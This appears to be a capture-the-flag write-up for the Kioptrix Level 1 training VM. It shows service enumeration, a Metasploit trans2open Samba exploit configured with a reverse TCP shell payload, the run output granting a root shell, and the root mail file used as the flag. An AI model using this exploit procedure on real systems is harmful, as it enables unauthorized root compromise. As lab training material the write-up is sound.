Coffee Difficulty Rating:

Author Description

The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

Service Enumeration

Port Service Version Detection

TCP: 22

SSH

OpenSSH 2.9p2 (protocol 1.99)

TCP: 80

HTTP

Apache httpd 1.3.20 ((Unix)

TCP: 111

RPC Bind

N/A

TCP: 139

netbios-ssn

Samba

TCP: 443

HTTPS

Apache httpd 1.3.20 ((Unix)

Samba Enumeration

Based on the age of the system other services, I know from exeperience that SAMBA is likely vulnerable to the trans2open exploit.

use exploit/linux/samba/trans2open

msf exploit(trans2open) > show options

Module options (exploit/linux/samba/trans2open):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.221.156  yes       The target address
   RPORT  139              yes       The target port


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.221.139  yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce

Metasploit Exploit

msf exploit(trans2open) > run

[*] [2015.12.20-21:05:39] Started reverse handler on 192.168.221.139:4444
[*] [2015.12.20-21:05:40] Trying return address 0xbffffdfc...
[*] [2015.12.20-21:05:41] Trying return address 0xbffffcfc...
[*] [2015.12.20-21:05:42] Trying return address 0xbffffbfc...
[*] [2015.12.20-21:05:43] Trying return address 0xbffffafc...
[*] Command shell session 1 opened (192.168.221.139:4444 -> 192.168.221.156:1025) at 2015-12-20 21:05:44 -0500


^Z
Background session 1? [y/N]  N

id
uid=0(root) gid=0(root) groups=99(nobody)
hostname
kioptrix.level1
^Z
Background session 1? [y/N]  y

Root Flag

Root Flag

sh-2.05# cd /var/spool/mail
cd /var/spool/mail
sh-2.05# ls
ls
harold
john
nfsnobody
root
sh-2.05# cat root   
cat root
From root  Sat Sep 26 11:42:10 2009
Return-Path: <[email protected]>
Received: (from root@localhost)
    by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
    for [email protected]; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <[email protected]>
Message-Id: <[email protected]>
To: [email protected]
Subject: About Level 2
Status: O

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...